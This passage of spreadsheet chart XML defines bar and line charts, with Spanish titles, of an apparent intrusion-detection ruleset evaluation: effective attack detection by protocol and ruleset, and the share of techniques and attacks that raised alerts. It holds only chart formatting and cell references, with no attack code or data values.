        <c:axId val="2099101452"/>
        <c:axId val="1803274534"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2099101452"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1803274534"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1803274534"/>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Promedio Detección Eficaz Ataques TP</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2099101452"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart37.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo (RS3)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GN$26:$GN$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GK$28:$GK$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GN$28:$GN$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="869325289"/>
        <c:axId val="233558381"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="869325289"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="233558381"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="233558381"/>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Promedio Detección Eficaz Ataques TP</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869325289"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart38.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo (RS2)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GR$27:$GR$28</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GO$29:$GO$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GR$29:$GR$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1381271635"/>
        <c:axId val="1922411249"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1381271635"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1922411249"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1922411249"/>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Promedio Detección Eficaz Ataques TP</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381271635"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart39.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo (RS1)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GV$28:$GV$29</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GS$29:$GS$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GV$30:$GV$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="264583529"/>
        <c:axId val="58179936"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="264583529"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="58179936"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="58179936"/>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Promedio Detección Eficaz Ataques TP</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264583529"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart40.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>RENDIMIENTO POR RULESET - DETECCIÓN EFICAZ ATAQUES</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FC$49:$FD$49</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="20"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="0"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="1"/>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr sz="2400"/>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FE$46:$FH$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FE$49:$FH$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1452579718"/>
        <c:axId val="1640365322"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1452579718"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>RENDIMIENTO PROMEDIO EFICAZ ATAQUES</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1640365322"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1640365322"/>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RENDIMIENTO</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452579718"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart4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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ POR RULESETS - LV1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HD$26:$HD$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HC$28:$HC$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HD$28:$HD$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HE$26:$HE$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HC$28:$HC$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HE$28:$HE$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="786901737"/>
        <c:axId val="829295170"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="786901737"/>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829295170"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="829295170"/>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786901737"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart4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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DETECCIÓN EFICAZ POR RULESETS - LV2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HC$28:$HC$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HF$28:$HF$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HC$28:$HC$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$HG$28:$HG$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="296787549"/>
        <c:axId val="562229817"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="296787549"/>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562229817"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="562229817"/>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296787549"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart4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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE  DE TÉCNICAS CON ALERTA TP POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>CON ALERTA</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="38761D">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$27:$DT$27</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$45:$DT$45</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>SIN ALERTA</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="EA4335"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$27:$DT$27</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$DQ$46:$DT$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="146107741"/>
        <c:axId val="2126333666"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="146107741"/>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2126333666"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2126333666"/>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46107741"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart44.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>PORCENTAJE  DE ATAQUES CON ALERTA TP POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>CON ALERTA</c:v>
          </c:tx>
          <c:spPr>
